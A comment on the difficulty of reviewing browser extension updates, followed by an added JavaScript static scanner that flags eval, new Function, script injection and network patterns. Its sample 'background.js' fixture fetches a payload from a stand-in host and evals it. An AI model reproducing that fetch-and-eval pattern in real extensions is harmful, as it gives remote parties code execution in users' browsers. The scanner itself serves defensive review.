You would need to have code review on every update and to ensure that no code downloads anything it evaluates, and potentially even check for interactions with other plugins which could be compromised to provide eval mechanisms in an effort to “wash hands” of any malicious changes in later updates. (Since the long tail of updates seems to be one of the significant risk factors, with less scrupulous actors trying to buy popular extensions for things like ad revenues before later dumping them to people who use them for malware, or lousy ones eventually turning to malware themselves.)

A review process can help, but sadly it’s got a lot of work to do if it wants to actually “solve” the problems here.
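As an added illustration of the kind of check the comment describes (not the commenter's code, and not any store's actual review tooling): a coarse static triage scan over an extension's JavaScript sources that flags dynamic-code sinks (eval, new Function, string timers), network fetches that could feed them, and cross-extension messaging hooks that another plugin could use as an eval mechanism. The pattern list, the verdict rules and the two sample files are constructed for this example; a real review would pair this with manual inspection, since regexes are easy to evade and also produce false positives.

```javascript
// Added example: static triage of extension sources for dynamic-code risk.
// Not the commenter's code; patterns, thresholds and samples are constructed.

// Source patterns that a reviewer of an extension update would want surfaced.
const DYNAMIC_CODE_PATTERNS = [
  { name: "eval", re: /\beval\s*\(/ },
  { name: "new Function", re: /\bnew\s+Function\s*\(/ },
  { name: "string timer", re: /\bset(?:Timeout|Interval)\s*\(\s*["'`]/ },
  { name: "script injection", re: /createElement\s*\(\s*["']script["']\s*\)/ },
  { name: "network", re: /\b(?:fetch|XMLHttpRequest|importScripts)\b/ },
  // Another (possibly compromised) extension talking to this one is the
  // "wash hands" channel the comment worries about.
  { name: "external messaging", re: /onMessageExternal|sendMessage\s*\(\s*["']/ },
];

// Patterns that turn text into executable code.
const EVAL_PATTERNS = ["eval", "new Function", "string timer", "script injection"];

// Constructed sample: a benign content script, and an update whose background
// page fetches remote text and evaluates it, plus an externally reachable sink.
const SAMPLE_FILES = {
  "content.js": `
    document.querySelectorAll("a").forEach(a => { a.rel = "noopener"; });
  `,
  "background.js": `
    fetch("https://example.invalid/payload.txt")
      .then(r => r.text())
      .then(code => { eval(code); });
    chrome.runtime.onMessageExternal.addListener((msg) => new Function(msg.body)());
  `,
};

// Scan one file; returns one finding per (line, pattern) hit.
function scanSource(fileName, source) {
  const findings = [];
  source.split("\n").forEach((line, idx) => {
    for (const p of DYNAMIC_CODE_PATTERNS) {
      if (p.re.test(line)) {
        findings.push({ file: fileName, line: idx + 1, pattern: p.name });
      }
    }
  });
  return findings;
}

// Scan a whole extension (map of file name -> source) and derive a verdict:
//   "reject"        network access combined with a code-evaluation sink
//   "manual review" any single flagged pattern
//   "clean"         nothing flagged (still not proof of safety)
function scanExtension(files) {
  const findings = Object.entries(files).flatMap(([name, src]) => scanSource(name, src));
  const hasNetwork = findings.some(f => f.pattern === "network");
  const hasEval = findings.some(f => EVAL_PATTERNS.includes(f.pattern));
  let verdict = "clean";
  if (hasEval && hasNetwork) verdict = "reject";
  else if (findings.length > 0) verdict = "manual review";
  return { findings, verdict };
}

// Stand-alone run over the constructed sample.
const report = scanExtension(SAMPLE_FILES);
for (const f of report.findings) {
  console.log(`${f.file}:${f.line} ${f.pattern}`);
}
console.log(`verdict: ${report.verdict}`);
```

The verdict rule deliberately treats "downloads something and evaluates something" as a reject even when the two are in different files, because the review cannot easily prove the fetched text never reaches the sink; the "external messaging" hit alone only escalates to manual review, since legitimate extensions use it too.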
